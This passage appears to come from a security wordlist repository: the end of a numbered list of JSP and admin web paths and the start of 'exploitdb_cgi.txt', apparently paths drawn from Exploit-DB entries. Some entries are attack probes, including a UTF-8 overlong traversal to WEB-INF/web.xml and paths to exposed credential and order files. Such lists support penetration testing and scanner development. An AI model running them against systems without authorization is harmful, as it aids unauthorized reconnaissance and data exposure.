/tmui/Control/jspmap/tmui/system/archive/properties.jsp 425 | /tmui/system/archive/properties.jsp 426 | /tvserver/reports/virtualIQAdminReports.do 427 | /tvserver/server/ 428 | /tvserver/server/%C0%AE%C0%AE/WEB-INF/web.xml 429 | /tvserver/server/inventory/inventoryTabs.jsp 430 | /tvserver/server/user/addDepartment.jsp 431 | /tvserver/server/user/setPermissions.jsp 432 | /tvserver/user/user.do 433 | /tvserver/user/user.do?command=save&userId=1 434 | /u/index.jsp 435 | /u/jsp/log/download_do.jsp 436 | /u/jsp/security/role_save_do.jsp 437 | /u/jsp/security/user_save_do.jsp 438 | /u/jsp/tools/exec.jsp 439 | /url.jsp 440 | /user-create.jsp 441 | /user-delete.jsp 442 | /user-edit-form.jsp 443 | /user-lockout.jsp 444 | /user-password.jsp 445 | /user-properties.jsp 446 | /user-roster-add.jsp 447 | /user-roster.jsp 448 | /usermode/consoleConnect.jsp 449 | /usr/BWhttpd/logs 450 | /vis/js/jquery.cookie.js 451 | /vsom/index.php/ 452 | /web-console/ 453 | /web/common/GenericError.jsp 454 | /webadmin/content/create_post.jsp 455 | /webadmin/fileformats/create_post.jsp 456 | /webadmin/users/create_post.jsp 457 | /webapp/jsp/calendar.jsp 458 | /webapps/portal/frameset.jsp 459 | /webconsole/faces/faces/faces/jsf/tips.jsp 460 | /webresources/AccountMgmt/Login 461 | /webresources/RecoveryMgmt/upload 462 | /wiki/Comment.jsp 463 | /wiki/Diff.jsp 464 | /wiki/Edit.jsp 465 | /wiki/Login.jsp 466 | /wiki/NewGroup.jsp 467 | /wiki/UserPreferences.jsp 468 | /wlse/configure/archive/archiveApplyDisplay.jsp 469 | /workorder/FileDownload.jsp 470 | /wps/wcm/webinterface/login/login.jsp 471 | /wsnavigator/jsps/explorer/help.jsp 472 | /xAdmin/html/cm_doclist_view_uc.jsp 473 | /xDashboard/html/jobhistory/downloadSupportFile.action 474 | -------------------------------------------------------------------------------- /exploitdb_cgi.txt: -------------------------------------------------------------------------------- 1 | /api/backup/version.cgi 2 | /root/www/api/backup/logout.cgi 3 | /my_cgi.cgi 4 | /uapi-cgi/viewer/simple_loglistjs.cgi 5 | /cgi-bin/pl_web.cgi/util_configlogin_act 6 | /findasus.cgi 7 | /checkLogin.cgi 8 | /tlogin.cgi 9 | /cgi-bin/password.cgi 10 | /cgi-bin/wowza.cgi 11 | /cgi-bin/system.cgi 12 | /1search.cgi 13 | /BRS_netgear_success.html 14 | /BUx8nLlIMxI 15 | /BlockSite.asp 16 | /BlockTime.asp 17 | /CGI-BIN/WCONSOLE.DLL 18 | /CGI-Bin/frame.html 19 | /Configuration_file.cfg 20 | /Contents/exportLogs.asp 21 | /DIRTOECART/index.cgi 22 | /Details.cfm 23 | /DetectionPolicy/rules/rulesimport.cgi 24 | /DocController 25 | /EDCstore.pl 26 | /GWExtranet/scp.dll 27 | /GWExtranet/scp.dll/frmonth 28 | /NeT/alpha.txt 29 | /PUBLIC/ADMIN/INDEX.HTM 30 | /PWD_password.htm 31 | /Pages/product.aspx 32 | /ROADS/cgi-bin/search.pl 33 | /Results.cfm 34 | /SCRIPTS/WA-MSD.EXE 35 | /SCRIPTS/WA-USIAINFO.EXE 36 | /SCRIPTS/WA.EXE 37 | /Scripts/wa-demo.exe 38 | /Sdocument702.html 39 | /ShowAlbum 40 | /ShowGraphic 41 | /ShowVideo 42 | /status.cgi 43 | /TR/2000/CR-SVG-20001102/DTD/svg-20001102.dtd 44 | /Translators/ 45 | /UNCWS/Management.asmx 46 | /Unsecured.cgi 47 | /UnsecuredEnable.cgi 48 | /WebAdmin.dll 49 | /WebAdmin/modalframe.wdm 50 | /WebAdmin/useredit_account.wdm 51 | /WebGUI/index.pl/homels 52 | /WebID/IISWebAgentIF.dll 53 | /YaBB.pl 54 | /ZendServer/Code-Tracing/Generate-Dump 55 | /ZendServer/Configuration/Webserver-Restart 56 | /ZendServer/Directives/Save/extension/WmVuZCBEZWJ1Z2dlcg%3D%3D 57 | /ZendServer/Directives/Save/extension/WmVuZCBKYXZhIEJyaWRnZQ%3D%3D 58 | /ZendServer/Directives/Save/extension/WmVuZCBPcHRpbWl6ZXIr 59 | /ZendServer/Job-Queue-Scheduling/Save-Rule 60 | /ZendServer/Page-Cache/Save-Rule 61 | /_vti_bin/_vti_adm/fpadmdll.dll 62 | /ad.cgi 63 | /adcenter.cgi 64 | /add_acl 65 | /addlink_lwp.cgi 66 | /admdat/admin.dat 67 | /admin.cgi 68 | /admin.pl 69 | /admin/index.pl 70 | /admin/restartMessage.shtml 71 | /admin/setgen/security.shtml 72 | /admin/user.pl 73 | /admin/user/user.cgi 74 | /admin/wg_user-info.ml 75 | /aktivate/cgi-bin/catgy.cgi 76 | /apply.cgi 77 | /apply2.cgi 78 | /apply_noauth.cgi 79 | /apps/web/global.fcgi 80 | /apps/web/index.fcgi 81 | /apps/web/vs_diag.cgi 82 | /as_web.exe 83 | /as_web4.exe 84 | /asterisk/contact_chooser.cgi 85 | /asterisk/contacts.cgi 86 | /at/create_job.cgi 87 | /atl.cgi 88 | /auction.pl 89 | /auth.cgi 90 | /auth.html 91 | /awcuser/cgi-bin/vcs 92 | /awstats.pl 93 | /awstats/awstats.pl 94 | /axis-cgi/admin/pwdgrp.cgi 95 | /axis-cgi/admin/restart.cgi 96 | /axis-cgi/buffer/command.cgi 97 | /axis-cgi/io/virtualinput.cgi 98 | /axoverzicht.cgi 99 | /backup/ 100 | /bandwidth/index.cgi 101 | /banners.cgi 102 | /bb/logs/evil.php3. 103 | /bin/common/addressbook.pl 104 | /bin/common/announcement.pl 105 | /bin/common/calendar.pl 106 | /bin/common/search.pl 107 | /bin/common/tasks.pl 108 | /bin/configure 109 | /bin/login.pl 110 | /bol.cgi 111 | /browse/CSCD-4753 112 | /bugs/index.php 113 | /bugzilla-tip/report.cgi 114 | /bugzilla/editflagtypes.cgi 115 | /c%3dAE 116 | /cBclw7uUuO4 117 | /cade/dot-it-yourself.cgi 118 | /calweb/calweb.exe 119 | /campas 120 | /cart.cgi 121 | /ccbill/whereami.cgi 122 | /cd-cgi/sscd_suncourier.pl 123 | /censtore.cgi 124 | /cgi-auth/userreg.cgi 125 | /cgi-bin 126 | /cgi-bin/.cobalt/message/message.cgi 127 | /cgi-bin/AT-generate.cgi 128 | /cgi-bin/DCShop/Auth_data/auth_user_file.txt 129 | /cgi-bin/DCShop/Orders/orders.txt 130 | /cgi-bin/FileSeek.cgi 131 | /cgi-bin/HASync/hasync.cgi 132 | /cgi-bin/MANGA/admin.cgi 133 | /cgi-bin/MANGA/admin.cgi. 134 | /cgi-bin/SGB_DIR/superguestconfig 135 | /cgi-bin/SetRS422Settings 136 | /cgi-bin/Web_Store/web_store.cgi 137 | /cgi-bin/YaBB.pl 138 | /cgi-bin/YaBB/YaBB.cgi 139 | /cgi-bin/acctman/amadmin.pl 140 | /cgi-bin/admin.cgi 141 | /cgi-bin/admin/artikeladmin.cgi 142 | /cgi-bin/admin/edit_startseitentext.cgi 143 | /cgi-bin/admin/index.cgi 144 | /cgi-bin/admin/rubrikadmin.cgi 145 | /cgi-bin/admin/setup_edit.cgi 146 | /cgi-bin/admin/shophilfe_suche.cgi 147 | /cgi-bin/adspro/dhtml.pl 148 | /cgi-bin/amlite/amadmin.pl 149 | /cgi-bin/anacondaclip.pl 150 | /cgi-bin/anyboard.cgi/ 151 | /cgi-bin/apexec.pl 152 | /cgi-bin/applyConfig.p 153 | /cgi-bin/auction/auction.cgi 154 | /cgi-bin/authLogin.cgi 155 | /cgi-bin/awl/auctionweaver.pl 156 | /cgi-bin/awstats-6.4/awstats.pl 157 | /cgi-bin/awstats.cgi 158 | /cgi-bin/awstats.pl 159 | /cgi-bin/bb-hostsvc.sh 160 | /cgi-bin/bbs/read.cgi 161 | /cgi-bin/betsie/parserl.pl/